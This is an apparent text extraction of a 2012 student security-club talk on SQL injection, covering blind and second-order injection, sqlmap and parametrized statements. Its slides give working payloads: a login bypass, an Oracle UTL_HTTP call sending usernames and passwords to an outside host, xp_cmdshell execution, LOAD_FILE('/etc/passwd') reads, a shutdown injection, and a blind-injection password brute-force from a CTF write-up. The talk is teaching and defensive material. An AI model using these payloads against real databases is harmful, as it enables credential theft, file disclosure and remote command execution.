let me sql inject your heart! -...
TRANSCRIPT
• Injection vulnerabilities are common for web applications. Some do target databases: « SQL injections ». The impact when exploiting such vulnerabilities rates from data retrieval, modifications, deletion till under certain case remote code execution!
• Speakers: Franck De Goër, Fabien Duchene
Let me SQL inject your heart! SecurIMAG 2012-02-09
WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability including for errors and omissions.
¡¡_ (in)security we trust _!!
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012
Franck De Goër
2
- Parcours : - prépa PT à F. Buisson (VOIRON, 38) - 1è Année ENSIMAG
- Objectifs : - ISI - thèse (?) - enseignement-recherche
- WHY Security? : Touche à toutes les branches de l'informatique, et multiples approches possibles pour un problème donné
Introduction Injection
attacking datastores (XPath, LDAP, SQL)
SQL language
SQL injection Definitions
Fingerprinting (specificities: Oracle, MS SQL, MySQL)
Some cool beef: first order SQLi
second order SQL injection blind SQLi
Automatic detection
Counter-measures
Conclusion
Outline
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 3
« Security exploitation technique that permits injecting data and/or code »
Some injection examples:
Targeted system
In-memory executable
Web Server CGI-like application
Data-Stores
What can be injected?
Assembly instructions
Additional HTML nodes
Additional DATA and or COMMANDS
Vulnerabilities examples
Buffer Overflow
Cross site scripting (XSS)
SQL injection
Use-After-Free SVG injection XPATH injection
… … LDAP injection
Injection
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 4
For a given transition (HTTP request / HTTP REPLY) an injection is the ability to craft an input parameter, so that a subsystem not filtering enough that input parameter uses it for data or code.
Input parameters examples:
- User-Agent:
- HTTP METHOD: HEAD, GET…
Output examples:
- HTTP CONTENT
- HTTP-Only cookies
- HTML code
Web injection - intuitively
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 5
- Relational databases. 1986. current: SQL3 (SQL99). SQL grammar
- language for:
-- interrogating: SELECT
-- data manipulation: UPDATE, INSERT, DELETE
-- data definition: CREATE, ALTER, DROP
-- data access control: GRANT, REVOKE
Database: francky-vincent
Table: accounts Table: news
id user password id date text
1 franck Ada.Text_Io 1 09-02-12 SQLi – F.De Goër – F. Duchene
2 securimag quarante-deux 2
... ...
field record
Structured Query Language
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 6
- interrogating a database: extract of the SQL grammar for the SELECT statement:
SELECT * FROM table WHERE cond
Eg: SELECT id FROM accounts WHERE user='franck' AND password='Ada.Text_Io'
Database: francky-vincent
Table: accounts Table: news
id user password id date text
1 franck Ada.Text_Io 1 09-02-12 SQLi – F.De Goër – F. Duchene
2 securimag quarante-deux 2
... ...
field record
SQL query example
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 7
Introduction Injection
attacking datastores (XPath, LDAP, SQL)
SQL language
SQL injection Definitions
Fingerprinting (specificities: Oracle, MS SQL, MySQL)
Some cool beef: first order SQLi
second order SQL injection blind SQLi
Automatic detection
Counter-measures
Conclusion
Outline
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 8
HTTP API
SQL
Eg: httpd+php
CGI
Eg: mysqld
Eg: mysql library
HTML HTTP
SQL injection – intuitively (1/4)
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 9
SQL Daemon HTTP client Eg: Browser
User input = a set of input parameters
The Web Application Hacker’s Handbook 2nd ed
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 10
HTML form:
HTTP Request:
SQL injection – intuitively (2/4)
Hidden.php (source code extract)
Some of the input parameters: GET - utilisateur=les blagues toto GET - motdepasse=sukZ! SQL Query (sent to the SQL driver via the SQL API): SELECT * FROM data WHERE user='les blagues toto' AND password='sukZ!'
SQL injection – intuitively (3/4)
SQL injection – intuitively (4/4)
Hidden.php (source code extract)
Some of the input parameters: GET - utilisateur=??? GET - motdepasse=????
-> Problem: how to bypass that authentication scheme?
SQL Query (sent to the SQL driver via the SQL API): SELECT * FROM data WHERE user='les blagues toto' AND password='sukZ!' OR 69=69 --'
SQL injection – intuitively - Franck DEMO
SQL injection – intuitively - Franck DEMO
Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
SQL injection – a formal definition (1/3)
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 14
Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
SQL injection – a formal definition (2/3)
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 15
Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
SQL injection – a formal definition (3/3)
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 16
Input parameter 1 Input parameter 2
Depending of how the web application developer did create his application:
- when we craft an input parameter, and the evaluated query is not conform wrt. SQL Grammar
- ERROR and or EXCEPTION MIGHT BE raised … or catched!
- SQL query that is sent to the SQL back-end is displayed
SQL injection with uncatched error / exception
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 17
Useful for:
- information gathering (part of a pentester’s job)
-- which SQL system is used? (software + version)
-- what is the SQL language version
-- what are the privileges the user does have
- stored procedures specific to an SQL server
- exploits specific to an SQL server version
Database system fingerprinting: WHY (1/4)
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 18
SecurIMAG -‐ =tle -‐ author -‐ date
DB \ impact HTTP, SMTP, TCP Requests
LDAP query! (11g)
Oracle SQL UTL_SMTP, UTL_HTTP UTL_TCP… toto’ || UTL_HTTP_REQUEST('irc.car-online.fr:80/'||(SELECT%20%username,password%FROM%data%WHERE 1))--
SYS.DBMS_LDAP.INIT('ldap.intranet:389',null) … SYS.DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.sub.car-online.fr',80)
Database system fingerprinting: WHY (2/4)
SecurIMAG -‐ =tle -‐ author -‐ date
DB \ impact
Remote command execution
Ability to write on the filesystem
Shutdown!!
MS-SQL Stored procedure: master..xp_cmdshell 'ipconfig /all > toto.txt'
SELECT * INTO OUTFILE '\\\\fqdn-server\\sharename\\output.txt' FROM users;
'shutdown --
Database system fingerprinting: WHY (3/4)
SecurIMAG -‐ =tle -‐ author -‐ date
DB \ impact Information disclosure Ability to write on the filesystem
MySQL SELECT LOAD_FILE('/etc/passwd')
SELECT * FROM data INTO OUTFILE '/tmp/wtf.txt'
Database system fingerprinting: WHY (4/4)
SecurIMAG -‐ =tle -‐ author -‐ date
DB \ impact
Causing a time delay
Database version
Current user privileges
Oracle UTL_HTTP.REQUEST('http://car-online.fr/time/10/')
SELECT banner FROM v$version
SELECT privilege FROM session_privs
MS-SQL WAITFOR DELAY '0:0:10'
SELECT @@version
SELECT grantee, table_name, privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES
MySQL SLEEP(100) SELECT @@version
SELECT * FROM information_schema.user_privileges WHERE grantee = (SELECT user())
The Web Application Hacker’s Handbook 2nd ed
Database system fingerprinting: HOW - try directly to inject parts of the previous SQL queries and check for
any output indicating that an error occurred. SOME EXAMPLES:
SecurIMAG -‐ =tle -‐ author -‐ date
Database system fingerprinting: Franck DEMO
Database system fingerprinting: Franck DEMO
Blind SQL injection
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 24
Sometimes, when an SQL error is raised, the SQL query in NOT present in the webpage (HTML) output!
“Blind SQLi”
Idea: discriminate the result by observing a DIFFERENCE in the OUTPUT (HTML) when a part of the SQL query the attacker controls evaluates to FALSE or TRUE
Eg: … WHERE cond1 AND cond2
Attacker controlled
Blind SQLi: obtaing information on records
SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY 2; --';
# return error if nb records < 2 # else return normal print
=> with several tests, possible to know the number of records To know record names, brutforce
SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY password; //';
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 25 25
Blind SQLi: obtaining the length of a password
For instance, if inputs are GET parameters :
http://vulnerable-web-site.com/script.php?id=1 AND
length(password)=$i
# return error if lenght(pass) != $i # else return normal print
=> by incrementing $i until normal print, we can know the length of the password
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 26
Blind SQLi: obtaining an integer value (1/5)
Blind SQLi: obtaining an integer value (2/5)
Blind SQLi: obtaining an integer value (3/)
Blind SQLi: obtaining an integer value (3/5)
Blind SQLi: obtaining an integer value (4/5)
Blind SQLi: obtaining an integer value (5/5)
Blind SQLi: obtaining the characters of a password
Get password characters
Clever brutforce
http://vulnerable-web-site.com/script.php?id=1 and substring(password,$i,1)=char($ascii_code)
# return error if the ith character isn't char($ascii_code) # else return normal print
=> by testing $ascii_code, we can know the ith password character
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 33
Blind SQLi – StalkR’s write-up for phplist SMPCTF 2010
From Blind SQL injection to local file inclusion! http://blog.stalkr.net/2010/07/smpctf-challenge-11-write-up-phplist.html#more
35
Where?
http://localhost/ex1/admin/?page=users&start=0&find=juanito&findby=email&sortby=0&sortorder=desc&id=0&find=juanito&findby=email
36
SQLi Query such as “SELECT field1, field2 FROM
table1 WHERE condition1 AND value2=[user_controlled_field]”
Filtering?
User controlled values? findby sortorder …
37
Interesting field for condition?
findby=email findby=1
same page output
38
findby=1
39
findby=1 AND 1 same page output! Nice start…
40
findby=1 AND 0
41
Blind SQLi discriminant
String present on the webpage when condition is evaluated to false
Eg: "Database error”
“You have an error”
..
42
Ex1 – Blind SQLi to LFI Requires FILE privilege LOAD_FILE Problem: filtering on quotes in the findby
parameter Hex encoded values
Findby=1 AND
substr(lpad(bin(ord(substr(load file(0x’+file.encode(’hex’)+’),’+str(charpos+1)+’,1))),8,0), ’+str(bitpos+1)+’ ,1)=1
43
StalkR script I did modify to take into account user-provided discriminant and that checks if the file does exist ensimag-student@bt:~/Desktop/ex1-script$ ./phplist_21012_sql_injection_local_file_disclosure.py
[*] phplist 2.10.12 SQL injection, local file disclosure
Usage: ./phplist_21012_sql_injection_local_file_disclosure.py <host> <path to phplist> <admin username> <admin password> <file to get> <discriminate_string_when_condition_evaluated_to_false>
44
45
46
From the server side: Observing if the user input controlled parameter is syntactically confined If not: this is a sufficient condition for saying it is an injection!
Automatic (and formal) detection
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 47
Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
SecurIMAG -‐ =tle -‐ author -‐ date
Automatic detection: sqlmap.py
- client side - Python script - Ability to fingerprint various SQL back-ends:
http://sqlmap.sourceforge.net/doc/README.pdf
SecurIMAG -‐ =tle -‐ author -‐ date
Automatic detection: sqlmap.py - DEMO
Franck DEMO
SecurIMAG -‐ =tle -‐ author -‐ date
Counter-measures: Input filters
Input Filters: some developers assume that filtering the input is enough. Which is sometimes not the case.
!%^$#! This however does complicate the injection!
Filter examples:
- PHP : addslashes() injection will still work if query is like:
… WHERE integer_field=[USER_CONTROLLED_INPUT]
SecurIMAG -‐ =tle -‐ author -‐ date
Input filters and Second Order SQL injections (1/2)
0. Filter: add a second quote 1. New user registration input1= meeraque' ; input2= Mj|_|@n|t0 INSERT INTO data (username,password) VALUES('meeraque''', ’Mj|_|@n|t0')
=> Record will contain meerauqe'
SecurIMAG -‐ =tle -‐ author -‐ date
2. Change password: SELECT password FROM data WHERE username='meeraque'’
MySQL error! ERROR: Unclosed quote @ 42 STR: ’
3. Exploitation: 3.1 Register a user with username ' OR 1 in (SELECT password FROM data WHERE username='admeenistraore')
3.2. try to change the password P0wn3d! Admin password in the MySQL error message!
Input filters and Second Order SQL injections (2/2)
Counter-measures: parametrized statements
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 53
- PROBLEM: the SQL injection problem come from a not clear separation between DATA and COMMAND parts when building the SQL query
- parametrized statements:
SecurIMAG -‐ =tle -‐ author -‐ date
Counter-measures: parametrized statements
Introduction Injection
attacking datastores (XPath, LDAP, SQL)
SQL language
SQL injection Definitions
Fingerprinting (specificities: Oracle, MS SQL, MySQL)
Some cool beef: first order SQLi
second order SQL injection blind SQLi
Automatic detection
Counter-measures
Conclusion
Outline
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 55 55
No questions please!
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 56
We have exhausted our knowledge… (and frankly, I feel more about starting the apero $